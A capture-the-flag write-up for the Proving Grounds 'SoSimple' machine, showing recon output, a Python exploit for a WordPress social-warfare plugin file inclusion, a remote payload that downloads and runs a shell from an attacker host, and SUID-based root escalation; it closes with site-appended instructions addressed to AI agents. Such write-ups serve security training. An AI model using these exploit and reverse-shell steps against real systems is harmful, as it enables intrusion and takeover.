# Proving grounds Play: SoSimple

Proving grounds Play - SoSimple CTF writeup.

### Walkthrough on Youtube

[![youtube](/files/U9Gw20dYlClcyE9Dxntn)](https://youtu.be/KodURDujWxs)

### NMAP

```sh
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b5543efafd03d0e63207af4ac416a45 (RSA)
|   256 53f5231be9aa8f41e218c6055007d8d4 (ECDSA)
|_  256 55b77b7e0bf54d1bdfc35da1d768a96b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### Fuzzing for directories and Files

```sh
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.158.78/FUZZ/
Total requests: 62284

=====================================================================
ID           Response   Lines    Word       Chars       Payload                               
=====================================================================

000000327:   200        147 L    646 W      13420 Ch    "wordpress"                           
000000386:   403        9 L      28 W       279 Ch      "icons"                               
000004227:   403        9 L      28 W       279 Ch      "server-status"                       
000004255:   200        77 L     39 W       495 Ch      "http://192.168.158.78//"             
000010756:   404        9 L      31 W       276 Ch      "secure_html"
```

### WPScan

```sh
+] social-warfare
 | Location: http://192.168.158.78/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2023-02-15T16:23:00.000Z
 | [!] The version is out of date, the latest version is 4.4.1
```

#### Searchsploit

![img](/files/SGqV7a81WNbzvke4C0tt)

#### Exploit

```py
import sys
import requests
import re
import urlparse
import optparse

class EXPLOIT:

	VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"

	def __init__(self, _t, _p):
		self.target  = _t
		self.payload = _p

	def engage(self):
		uri = urlparse.urljoin( self.target, self.VULNPATH % self.payload )
		r = requests.get( uri )
		if r.status_code == 500:
			print "[*] Received Response From Server!"
			rr  = r.text
			obj = re.search(r"^(.*)<\!DOCTYPE", r.text.replace( "\n", "lnbreak" ))
			if obj:
				resp = obj.groups()[0]
				if resp:
					print "[<] Received: "
					print resp.replace( "lnbreak", "\n" )
				else:
					sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
			else:
				sys.exit("[<] Nothing Received for the given payload. Seems like the server is not vulnerable!")
		else:
			sys.exit( "[~] Unexpected Status Received!" )

def main():
	parser = optparse.OptionParser(  )

	parser.add_option( '-t', '--target', dest="target", default="", type="string", help="Target Link" )
	parser.add_option( ''  , '--payload-uri', dest="payload", default="", type="string", help="URI where the file payload.txt is located." )

	(options, args) = parser.parse_args()

	print "[>] Sending Payload to System!"
	exploit = EXPLOIT( options.target, options.payload )
	exploit.engage()

if __name__ == "__main__":
	main()
```

Vulnerable PATH

```py
VULNPATH = "wp-admin/admin-post.php?swp_debug=load_options&swp_url=%s"
```

#### Remote File Inclusion

**Remote payload file**

```
<pre>
system("wget http://192.168.45.217:8000/shell  -O /var/tmp/shell; chmod 755 /var/tmp/shell; chmod +x /var/tmp/shell; /var/tmp/shell");
</pre>
```

#### Reverse shell payload using msfvenom

![img](/files/ScNkfuvyrUKRyzgxcdaO)

#### RFI Exploitation

![img](/files/CumlogpE5kU2jhfnw2lR)

**Reverse shell connection obtained.**

### Privilege Escalation

User `max` ssh id\_rsa file has been found.

![img](/files/s6fyqdDDNYrk7IjBwgwG)

#### SSH login to max

![img](/files/XEuKD432fPk0G88rYEbJ)

Listing `max` user permission, finding exploit for the `service` using GTFO bins and switch user to `steven`

![img](/files/bOv5AIw2Bdndm4nmzR1u)

Listing `steven` user permisssions

![img](/files/jZIzALFcOpvsjIaPzHeU)

Create bash script using the location mentioned in the permissions.

```sh
#!/bin/bash

cp /bin/dash /var/tmp/dash; chmod u+s /var/tmp/dash
```

`chmod u+s` Allows the binary to be executed as owner + SUID permissions.

#### Running script as root user

![img](/files/Vy9hQHtkIYdAEhsWfLVF)

**Run** `dash`

![img](/files/JL89UhrwfZSUtld7gMd3)

`dash -p` preserves effective privilege with which it was created and executed with same privilege.

**Root obtained.**

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://thevillagehacker-security.gitbook.io/ctf-writeups/writeups/2023-07-22-proving_grounds_play-sosimple.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.